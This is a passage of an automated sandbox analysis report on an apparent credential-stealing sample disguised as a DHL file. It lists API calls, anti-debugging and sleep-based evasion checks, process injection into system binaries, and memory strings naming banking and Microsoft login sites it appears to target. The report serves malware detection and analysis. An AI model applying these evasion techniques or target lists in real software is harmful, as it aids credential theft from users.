            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E rdtsc 2_2_0337096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 3360Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 6613Jump to behavior
            Source: C:\Users\user\Desktop\DHL 40312052024.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-103338
            Source: C:\Users\user\Desktop\DHL 40312052024.exeAPI coverage: 4.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2924Thread sleep count: 3360 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2924Thread sleep time: -6720000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2924Thread sleep count: 6613 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2924Thread sleep time: -13226000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe TID: 7060Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe TID: 7060Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe TID: 7060Thread sleep time: -33000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0081445A
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081C6D1 FindFirstFileW,FindClose,0_2_0081C6D1
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0081C75C
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0081EF95
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0081F0F2
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0081F3F3
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_008137EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008137EF
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_00813B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00813B12
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0081BCBC
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007B49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007B49A0
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: F56GKLK7U4.4.drBinary or memory string: discord.comVMware20,11696428655f
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: global block list test formVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: F56GKLK7U4.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4472859486.00000000009A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
            Source: F56GKLK7U4.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: F56GKLK7U4.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: netbtugc.exe, 00000004.00000002.4472527689.00000000028BE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2499258829.000001C28C08C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: F56GKLK7U4.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: F56GKLK7U4.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: F56GKLK7U4.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: DHL 40312052024.exe, 00000000.00000002.2053238601.0000000001317000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exeZu
            Source: F56GKLK7U4.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: F56GKLK7U4.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: F56GKLK7U4.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E rdtsc 2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417823 LdrLoadDll,2_2_00417823
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_00823F09 BlockInput,0_2_00823F09
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007B3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007B3B3A
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007E5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_007E5A7C
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007B4B37 LoadLibraryA,GetProcAddress,0_2_007B4B37
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0149C4A8 mov eax, dword ptr fs:[00000030h]0_2_0149C4A8
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0149DB38 mov eax, dword ptr fs:[00000030h]0_2_0149DB38
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0149DAD8 mov eax, dword ptr fs:[00000030h]0_2_0149DAD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C310 mov ecx, dword ptr fs:[00000030h]2_2_0332C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350310 mov ecx, dword ptr fs:[00000030h]2_2_03350310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D437C mov eax, dword ptr fs:[00000030h]2_2_033D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov ecx, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA352 mov eax, dword ptr fs:[00000030h]2_2_033FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D8350 mov ecx, dword ptr fs:[00000030h]2_2_033D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]2_2_0335438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]2_2_0335438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033663FF mov eax, dword ptr fs:[00000030h]2_2_033663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov ecx, dword ptr fs:[00000030h]2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]2_2_033D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]2_2_033D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC3CD mov eax, dword ptr fs:[00000030h]2_2_033EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B63C0 mov eax, dword ptr fs:[00000030h]2_2_033B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332823B mov eax, dword ptr fs:[00000030h]2_2_0332823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332826B mov eax, dword ptr fs:[00000030h]2_2_0332826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A250 mov eax, dword ptr fs:[00000030h]2_2_0332A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336259 mov eax, dword ptr fs:[00000030h]2_2_03336259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h]2_2_033EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h]2_2_033EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B8243 mov eax, dword ptr fs:[00000030h]2_2_033B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B8243 mov ecx, dword ptr fs:[00000030h]2_2_033B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]2_2_033402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]2_2_033402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov ecx, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]2_2_0336E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]2_2_0336E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360124 mov eax, dword ptr fs:[00000030h]2_2_03360124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov ecx, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F0115 mov eax, dword ptr fs:[00000030h]2_2_033F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C156 mov eax, dword ptr fs:[00000030h]2_2_0332C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C8158 mov eax, dword ptr fs:[00000030h]2_2_033C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]2_2_03336154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]2_2_03336154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov ecx, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034061E5 mov eax, dword ptr fs:[00000030h]2_2_034061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03370185 mov eax, dword ptr fs:[00000030h]2_2_03370185
